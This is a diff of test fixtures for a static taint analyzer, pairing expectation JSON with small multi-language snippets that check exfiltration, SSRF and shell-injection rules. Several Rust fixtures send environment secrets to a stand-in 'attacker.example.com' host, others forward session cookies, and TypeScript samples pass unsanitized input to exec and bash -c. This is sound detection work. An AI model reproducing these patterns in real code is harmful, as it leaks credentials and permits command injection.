"notes": "fetch URL is a fixed literal — body taint must not fire as SSRF."
},
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [10, 17],
"notes": "req.cookies.session → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the body field."
}
]
}

View file

@ -0,0 +1,18 @@
var express = require('express');
var app = express();
// Session-id forwarder: an internal handler proxies the user's session
// cookie into the body of an outbound request to a fixed analytics URL.
// The destination is hardcoded so SSRF must NOT fire, but the source is
// Sensitive-tier (cookie carries auth material) so Cap::DATA_EXFIL MUST
// fire — operator-bound state is leaving the process via the request
// payload.
app.get('/sync', function(req, res) {
var sid = req.cookies.session;
fetch('https://analytics.internal/track', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ session: sid }),
});
res.status(204).end();
});

View file

@ -1,6 +1,6 @@
{
"description": "fetch() with a fixed destination URL and an attacker-controlled body. SSRF must NOT fire (destination is not attacker-influenced) and the cross-boundary data-exfiltration class (Cap::DATA_EXFIL) MUST fire on the body field.",
"tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution"],
"description": "fetch() with a fixed destination URL and a plain user-input body (req.body.message). SSRF must NOT fire (destination is not attacker-influenced) and DATA_EXFIL must NOT fire either: plain user input echoed back via an outbound body is not a cross-boundary disclosure (the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL).",
"tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution", "sensitivity-gate"],
"modes": ["full"],
"expected": [
{
@ -11,9 +11,9 @@
},
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"must_not_match": true,
"line_range": [7, 14],
"notes": "Body field carries req.body.message → must fire DATA_EXFIL (sensitive data leaving the process via outbound request payload)."
"notes": "Body source is plain user input (req.body.message → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources (cookies, headers, env, db, file) — plain user input echoed into a request body is not data exfiltration. See fetch_body_user_input_silenced.js for the unit-level regression."
}
]
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_setopt($ch, CURLOPT_POSTFIELDS, $payload) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a define-style identifier via the macro-arg fallback, narrowing the gate so DATA_EXFIL fires only at the body-binding setopt call. The cookie source is Sensitivity::Sensitive so DATA_EXFIL must fire. The CURLOPT_RETURNTRANSFER setopt on the next line must NOT trigger the gate (different option, not a body slot).",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [3, 10],
"notes": "$_COOKIE['auth_token'] → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,10 @@
<?php
function leak_session() {
$token = $_COOKIE['auth_token'];
$ch = curl_init('https://analytics.internal/track');
curl_setopt($ch, CURLOPT_POSTFIELDS, "session={$token}");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
curl_close($ch);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source ($_POST). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.php to assert per-tier routing for PHP.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [3, 9],
"notes": "Body source is plain user input ($_POST → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,9 @@
<?php
function forward_message() {
$msg = $_POST['message'];
$ch = curl_init('https://telemetry.internal/forward');
curl_setopt($ch, CURLOPT_POSTFIELDS, "message={$msg}");
curl_exec($ch);
curl_close($ch);
}

View file

@ -0,0 +1,19 @@
{
"description": "Container-taint DATA_EXFIL: payload dict accumulates os.environ.get() secrets across multiple keys, then flows into requests.post(json=payload). The SSA heap Elements slot carries the cap from each `payload[k] = ...` store to the sink-side heap-load, so DATA_EXFIL must fire on the json field. Mirrors `array_push_data_exfil.js` / `map_assign_data_exfil.go` for cross-language container-taint coverage.",
"tags": ["taint", "data-exfil", "requests", "container", "heap-elements", "env", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [18, 22],
"notes": "Dict population with env secrets, then requests.post(json=...). Container-taint round-trip must fire DATA_EXFIL on the json field."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [18, 22],
"notes": "Destination URL is a fixed literal — body taint must not surface as SSRF."
}
]
}

View file

@ -0,0 +1,23 @@
import os
import requests
from flask import Flask, request
app = Flask(__name__)
# Container-taint DATA_EXFIL: a dict accumulates env-config secrets across
# keys, then is forwarded as the JSON body of an outbound POST to a fixed
# URL. The Python SSA heap model marks the dict's `Elements` slot tainted
# at every `payload[k] = ...` write; the sink-side
# `collect_tainted_sink_values` heap-loads the same slot when checking the
# `json` kwarg, so DATA_EXFIL must fire on the json field even though
# `payload` itself is not directly tainted by an Assign. Pairs with
# `httpx_async_post_data_exfil.py` (single-key dict literal — no
# container-mutation step).
@app.route('/upload-config', methods=['POST'])
def upload_config():
payload = {}
payload['api_key'] = os.environ.get('UPSTREAM_API_KEY')
payload['region'] = os.environ.get('UPSTREAM_REGION')
requests.post('https://api.internal/ingest', json=payload)
return 'ok'

View file

@ -0,0 +1,13 @@
{
"description": "Async DATA_EXFIL via httpx.AsyncClient: os.environ.get() (EnvironmentConfig — Sensitive-tier) flows into the json kwarg of an async client.post() call against a fixed URL. The receiver type resolves to HttpClient so the gated DATA_EXFIL fires via the type-qualified `HttpClient.post` matcher; the destination is hardcoded so SSRF must NOT fire.",
"tags": ["taint", "data-exfil", "httpx", "async", "type-qualified", "sensitivity-gate"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [15, 20],
"notes": "os.environ → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the json kwarg of HttpClient.post."
}
]
}

View file

@ -0,0 +1,20 @@
import os
from fastapi import FastAPI, Request
import httpx
app = FastAPI()
# Async data-exfil path: an `httpx.AsyncClient` instance dispatches a POST
# whose `json` kwarg embeds an environment-config secret. The chained-call
# normalization collapses `httpx.AsyncClient().post` to the gate matcher
# `httpx.AsyncClient.post` so the gated DATA_EXFIL fires. Source is
# Sensitivity::Sensitive (EnvironmentConfig) so DATA_EXFIL MUST fire on the
# json kwarg; the destination URL is fixed so SSRF must NOT fire.
@app.post('/sync-async')
async def sync_async(req: Request):
api_key = os.environ.get('UPSTREAM_API_KEY')
await httpx.AsyncClient().post(
'https://upstream.internal/ingest',
json={'api_key': api_key},
)
return {'ok': True}

View file

@ -0,0 +1,13 @@
{
"description": "Session-token forwarder: flask `session` (Sensitive-tier source) flows into a fixed-URL requests.post body. SSRF must NOT fire (destination is hardcoded), but Cap::DATA_EXFIL MUST fire — auth-bearing operator state is leaving the process via the outbound payload. Mirrors the JS fetch_session_forward case for Python.",
"tags": ["taint", "data-exfil", "requests", "sensitivity-gate", "session", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [12, 18],
"notes": "session.get('user_token') → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the json kwarg of requests.post."
}
]
}

View file

@ -0,0 +1,18 @@
from flask import Flask, request, session
import requests
app = Flask(__name__)
# Sensitive-source forwarder: the Flask session cookie carries auth material
# and is being forwarded to a fixed analytics URL via the request body. The
# destination is hardcoded so SSRF must NOT fire, but the source is
# Sensitivity::Sensitive (session ↔ Cookie) so DATA_EXFIL MUST fire — the
# auth-bearing operator state is leaving the process via the outbound payload.
@app.route('/sync')
def sync_session():
sid = session.get('user_token')
requests.post(
'https://analytics.internal/track',
json={'session': sid},
)
return '', 204

View file

@ -0,0 +1,19 @@
{
"description": "requests.post(taintedUrl, json={fixed}) — destination-aware case for Python. URL is tainted (SSRF), body is fixed. SSRF must fire and the cross-boundary data-exfiltration class (Cap::DATA_EXFIL) must NOT fire — the two classes share the callee but cap attribution is per-position.",
"tags": ["taint", "ssrf", "requests", "destination-aware", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_match": true,
"line_range": [13, 18],
"notes": "request.args.get('target') → requests.post(target, json={...}) — tainted URL fires SSRF."
},
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [13, 18],
"notes": "Body json kwarg is a fixed literal — DATA_EXFIL must NOT fire on this site (regression guard for per-cap attribution)."
}
]
}

View file

@ -0,0 +1,18 @@
from flask import Flask, request
import requests
app = Flask(__name__)
# URL-only taint: the destination URL is attacker-controlled but the body is
# a fixed literal. SSRF must fire on the URL flow. DATA_EXFIL must NOT fire
# because no body kwarg carries taint (regression guard for per-cap
# attribution — the two classes share the callee but cap routing is per
# argument position).
@app.route('/proxy', methods=['POST'])
def proxy():
target = request.args.get('target')
requests.post(
target,
json={'event': 'proxy_call'},
)
return '', 204

View file

@ -0,0 +1,13 @@
{
"description": "requests.post() with a fixed destination URL and a plain user-input body (request.form). DATA_EXFIL must NOT fire: plain user input echoed back via an outbound body is not a cross-boundary disclosure (the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL). Pairs with requests_post_session_token.py to assert per-tier routing for Python.",
"tags": ["taint", "data-exfil", "requests", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [13, 19],
"notes": "Body source is plain user input (request.form → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources (cookies, sessions, headers, env) — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,19 @@
from flask import Flask, request
import requests
app = Flask(__name__)
# Plain user input echoed back into a fixed-URL request body. The destination
# is hardcoded so SSRF must NOT fire. DATA_EXFIL must NOT fire either: the
# source is Sensitivity::Plain (request.form is raw user input) and the
# source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL.
# Echoing the user's own data back to telemetry is not a cross-boundary
# disclosure — it is exactly what the API gateway pattern does.
@app.route('/forward', methods=['POST'])
def forward_message():
payload = request.form.get('message')
requests.post(
'https://telemetry.internal/forward',
data={'message': payload},
)
return '', 204

View file

@ -0,0 +1,13 @@
{
"description": "Net::HTTP.post(uri, body) with the body interpolating a session cookie value. Destination is fixed so SSRF must NOT fire on the URL flow, but DATA_EXFIL MUST fire — request.cookies is Sensitivity::Sensitive and the auth-bearing operator state is leaving the process via the outbound payload.",
"tags": ["taint", "data-exfil", "net-http", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 7],
"notes": "request.cookies[:auth_token] → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the body of Net::HTTP.post."
}
]
}

View file

@ -0,0 +1,8 @@
require 'net/http'
require 'uri'
def forward_session(request)
sid = request.cookies[:auth_token]
uri = URI('https://analytics.internal/track')
Net::HTTP.post(uri, "session=#{sid}")
end

View file

@ -0,0 +1,13 @@
{
"description": "RestClient.post() with a fixed destination URL and a plain user-input body (params[:message]). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_net_http_post.rb to assert per-tier routing for Ruby.",
"tags": ["taint", "data-exfil", "rest-client", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [3, 9],
"notes": "Body source is plain user input (params → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,9 @@
require 'rest-client'
def forward_message(params)
message = params[:message]
RestClient.post(
'https://telemetry.internal/forward',
{ message: message }.to_json
)
end

View file

@ -0,0 +1,31 @@
{
"description": "DATA_EXFIL: env::var flows to hyper::Request::builder().body() chain.",
"tags": ["taint", "data_exfil", "hyper"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [5, 12],
"evidence_contains": [],
"notes": "env-config secret flows into hyper Request::builder().body() body-bind, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [5, 7],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [7, 12],
"evidence_contains": [],
"notes": ".unwrap() on Request::builder().body() Result"
}
]
}

View file

@ -0,0 +1,12 @@
// DATA_EXFIL: env-config flows into hyper Request::builder().body(payload).
// The body-bind step on the request builder is itself the leak point;
// the `Request::builder.body` chain matcher (with `.unwrap` peel) fires
// DATA_EXFIL on the build statement.
fn exfil_hyper() {
let secret = std::env::var("LICENSE_KEY").unwrap();
let _req = hyper::Request::builder()
.method("POST")
.uri("https://attacker.example.com/collect")
.body(secret)
.unwrap();
}

View file

@ -0,0 +1,19 @@
{
"description": "Async DATA_EXFIL parity: client.post(URL).body(secret).send().await preserves the cap split identically to the synchronous .send() case. The chained-call normalization peels the trailing .await so the body-binding matcher resolves; awaiting cannot strip taint.",
"tags": ["taint", "data-exfil", "reqwest", "async", "await", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [9, 14],
"notes": "env::var secret → .body(secret).send().await must fire DATA_EXFIL on the body channel."
},
{
"rule_id": "rs.quality.unwrap",
"must_match": true,
"line_range": [9, 10],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,15 @@
// Async DATA_EXFIL: `client.post(URL).body(payload).send().await` must
// preserve the cap split identically to the synchronous `.send()` case
// in `data_exfil_reqwest_body.rs`. The chained-call normalization
// collapses `.send().await` to the body-binding chain matcher (the
// peel-identity-suffix step strips `.await` before suffix matching) so
// DATA_EXFIL fires on the body channel. URL is hardcoded, so SSRF must
// not fire.
async fn leak_secret_async() {
let secret = std::env::var("API_KEY").unwrap();
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect")
.body(secret)
.send()
.await;
}

View file

@ -0,0 +1,23 @@
{
"description": "DATA_EXFIL: env::var flows to reqwest Client::post().body(secret).send() chain.",
"tags": ["taint", "data_exfil", "reqwest"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [6, 12],
"evidence_contains": [],
"notes": "env-config secret flows into reqwest .body() body-bind chain, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [6, 8],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,12 @@
// DATA_EXFIL: env-config (Sensitive) flows into reqwest's `.body()` chain.
// The all-in-one chain `Client::new().post(url).body(payload).send()`
// reduces to chain text containing `body.send`, so the body-binding chain
// matcher fires DATA_EXFIL and not SSRF. URL is hardcoded so SSRF must
// not fire on this finding.
fn leak_secret() {
let secret = std::env::var("API_KEY").unwrap();
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect")
.body(secret)
.send();
}

View file

@ -0,0 +1,23 @@
{
"description": "DATA_EXFIL: env::var flows to reqwest Client::post().form(&secret).send() chain.",
"tags": ["taint", "data_exfil", "reqwest"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [4, 10],
"evidence_contains": [],
"notes": "env-config secret flows into reqwest .form() body-bind chain, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [4, 6],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: env-config flows into reqwest's `.form()` chain. The
// form-encoded payload leaks the operator-bound secret, so DATA_EXFIL
// fires at the chain via the `form.send` body-bind suffix matcher.
fn exfil_form() {
let secret = std::env::var("OAUTH_REFRESH_TOKEN").unwrap();
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect")
.form(&secret)
.send();
}

View file

@ -0,0 +1,23 @@
{
"description": "DATA_EXFIL: env::var flows to reqwest Client::post().json(&secret).send() chain.",
"tags": ["taint", "data_exfil", "reqwest"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [4, 10],
"evidence_contains": [],
"notes": "env-config secret flows into reqwest .json() body-bind chain, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [4, 6],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: env-config flows into reqwest's `.json()` chain. The
// JSON-encoded body still leaks the operator-bound secret, so DATA_EXFIL
// fires at the chain via the `json.send` body-bind suffix matcher.
fn exfil_json() {
let secret = std::env::var("DATABASE_PASSWORD").unwrap();
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect")
.json(&secret)
.send();
}

View file

@ -0,0 +1,23 @@
{
"description": "DATA_EXFIL: env::var flows to surf::post().body_string() chain.",
"tags": ["taint", "data_exfil", "surf"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [5, 9],
"evidence_contains": [],
"notes": "env-config secret flows into surf .body_string body-bind, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [5, 7],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,9 @@
// DATA_EXFIL: env-config flows into surf's body-binding terminal verb.
// `surf::post(url).body_string(payload)` is the body-bind step; the
// `body_string` bare matcher fires DATA_EXFIL because the method name
// is unambiguous in Rust HTTP-client code.
fn exfil_surf() {
let secret = std::env::var("APP_SECRET").unwrap();
let _ = surf::post("https://attacker.example.com/collect")
.body_string(secret);
}

View file

@ -0,0 +1,23 @@
{
"description": "DATA_EXFIL: env::var flows to ureq::post().send_string() chain.",
"tags": ["taint", "data_exfil", "ureq"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [4, 8],
"evidence_contains": [],
"notes": "env-config secret flows into ureq .send_string, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [4, 6],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,8 @@
// DATA_EXFIL: env-config flows into ureq's combined body-bind/dispatch
// terminal verb. `ureq::post(url).send_string(payload)` consumes the
// payload; the `send_string` bare matcher fires DATA_EXFIL.
fn exfil_ureq() {
let secret = std::env::var("ADMIN_TOKEN").unwrap();
let _ = ureq::post("https://attacker.example.com/collect")
.send_string(&secret);
}

View file

@ -0,0 +1,31 @@
{
"description": "Regression: URL-only chain (no body-bind) fires SSRF only, no DATA_EXFIL.",
"tags": ["taint", "ssrf", "regression"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"severity": null,
"must_match": true,
"line_range": [8, 9],
"evidence_contains": [],
"notes": "URL flows to reqwest Client::new().post(&url) — SSRF must fire"
},
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_not_match": true,
"line_range": [8, 9],
"evidence_contains": [],
"notes": "No body-binding step in chain — DATA_EXFIL must NOT fire"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [8, 9],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,10 @@
// Regression: a tainted URL flowing through a reqwest chain *without*
// a body-binding step must fire SSRF (taint-unsanitised-flow) but must
// NOT fire DATA_EXFIL. The chain text reduces to `Client::new.post`
// with no `body|json|form|multipart` segment, so the body-bind chain
// matcher cannot attach. Guards against the new chain-aware DATA_EXFIL
// rule over-firing on pure URL flows.
fn fetch_url_only() {
let url = std::env::var("TARGET_URL").unwrap();
let _ = reqwest::Client::new().post(&url).send();
}

View file

@ -0,0 +1,14 @@
{
"description": "Regression guard for for-of array-destructure taint propagation. Without the fix, taint stops at `files` and never reaches `filePath` inside the loop body.",
"tags": ["taint", "shell-injection", "for-of", "destructure", "typescript"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_match": true,
"line_range": [12, 16],
"evidence_contains": [],
"notes": "TP: req.body.files → Object.entries → destructured filePath → exec template literal. Fires only when the for_in_statement's pattern bindings are registered as defines."
}
]
}

View file

@ -0,0 +1,19 @@
// Regression guard for the for-of-with-array-destructure taint propagation
// fix: `for (const [a, b] of Object.entries(tainted))` must propagate the
// iterable's taint to the destructured bindings, otherwise patterns like
// the docker.ts shell-injection (where filePath is bound by destructure-iter
// from a tainted parameter) silently lose the flow.
import express from "express";
const app = express();
const { exec } = require("child_process");
app.post("/files", async (req: any, res: any) => {
const files = req.body.files;
for (const [filePath, content] of Object.entries(files)) {
// TP: filePath is destructured from Object.entries(files) where files
// carries taint. Without the for-of pattern handler the binding
// is never registered as a definition and taint stops at `files`.
exec(`rm -rf /tmp/${filePath}`);
}
res.send("ok");
});

View file

@ -0,0 +1,38 @@
{
"description": "Regression guard: static shell payloads, non-shell arrays, canonical Dockerode argv, opaque array vars, and execSync(cmd, { env: process.env }) must not fire SHELL_ESCAPE.",
"tags": ["taint", "shell-injection", "shell-array", "regression-guard", "typescript"],
"modes": ["full"],
"strict_unexpected": ["taint-unsanitised-flow"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [13, 18],
"notes": "Constant shell payload — no idents in element 2, detector emits no sink filter."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [20, 26],
"notes": "First element is not a known shell — detector ignores even though element 2 is tainted."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [28, 34],
"notes": "Canonical Dockerode argv form — constant array, locked in by EXCLUDES."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [37, 43],
"notes": "Opaque variable, not a literal — detector inspects only literal arrays."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [46, 49],
"notes": "execSync(cmd, { env: process.env }) — arg 1 is the options object, not the command. Locked in by =execSync gate's payload_args: &[0]."
}
]
}

View file

@ -0,0 +1,52 @@
// Negative regression: shell-arrays whose payload is a static literal must
// not fire (no taint can reach a constant), and array literals whose first
// element is not a known shell must not fire even with taint in element 2.
// Also locks in the four FPs documented in the recent EXCLUDES carve-out:
// the canonical Dockerode `container.exec({ Cmd: argv })` form, an opaque
// untainted-array variable, and `execSync(cmd, { env: process.env })`.
import Docker from "dockerode";
const docker = new Docker({ socketPath: "/var/run/docker.sock" });
async function inert(_id: string, _cmd: string[]): Promise<void> {}
export async function staticShellPayload(req: any): Promise<void> {
// Constant payload — the third element is a literal string. Even though
// the array shape matches [bash, -c, *], no identifiers exist in element
// 2 so the detector emits no sink filter.
await inert("c", ["bash", "-c", "ls -la /app"]);
}
export async function nonShellArray(req: any): Promise<void> {
const tainted = req.query.cmd;
// First element is not a known shell. Detector should not match even
// though element 2 carries taint.
await inert("c", ["ls", "-la", tainted]);
}
export async function dockerodeCanonicalArgv(
containerId: string,
req: any
): Promise<void> {
const container = docker.getContainer(containerId);
// Canonical Dockerode shape: argv is passed directly to execve, no shell
// parsing. Constant array — must not fire, locked in by EXCLUDES.
await container.exec({ Cmd: ["ls", "-la"], AttachStdout: true });
}
export async function dockerodeOpaqueArrayVar(
containerId: string,
argv: string[]
): Promise<void> {
const container = docker.getContainer(containerId);
// Variable, not literal — detector inspects only literal arrays.
await container.exec({ Cmd: argv, AttachStdout: true });
}
export async function execSyncWithEnv(_req: any): Promise<void> {
const { execSync } = require("child_process");
// Existing carve-out: the env arg is never a shell-injection payload, the
// bare destructured-import `execSync` gate (=execSync) restricts
// payload_args to arg 0 (the command string). Locked in.
execSync("npx playwright test", { env: process.env });
}

View file

@ -0,0 +1,14 @@
{
"description": "Shell-injection via [shell, '-c', tainted] array passed through a user-defined wrapper. Detection must fire at the array literal site without per-wrapper summary annotation.",
"tags": ["taint", "shell-injection", "shell-array", "typescript"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_match": true,
"line_range": [24, 29],
"evidence_contains": [],
"notes": "TP: req.query.name flows through the third array element of a [bash, -c, ...] shell-array passed to an opaque wrapper. The shell-array shape itself is the gate."
}
]
}

View file

@ -0,0 +1,31 @@
// Reproduces the docker.ts pattern: a user-defined wrapper passes a shell-array
// literal to an opaque helper that ultimately invokes the shell. The taint
// vector is the third array element (the shell command string) — single-quote
// escaping in the interpolated `name` breaks out of the surrounding `'...'`
// and runs arbitrary commands. Detection must fire at the wrapper call site
// without needing any summary annotation on `runShellWrapper`.
import express from "express";
const app = express();
async function runShellWrapper(_id: string, _cmd: string[]): Promise<string> {
// Opaque wrapper. In real code this dispatches to Dockerode
// `container.exec({Cmd: cmd})` — the shell-array recognition runs at the
// *outer* call site below, not here, because `container.exec` is excluded
// from flat sink classification on purpose (it accepts non-shell argv
// arrays in the canonical form).
return "";
}
app.get("/run", async (req: any, res: any) => {
const name = req.query.name;
// TP: `name` is interpolated inside a single-quoted shell context. A
// quote in `name` escapes the quoting and runs arbitrary shell commands.
// Detection must fire here, at the call site of the user wrapper, even
// though the wrapper is opaque to summary inference.
await runShellWrapper("container-id", [
"bash",
"-c",
`echo 'hello ${name}' > /tmp/out`,
]);
res.send("ok");
});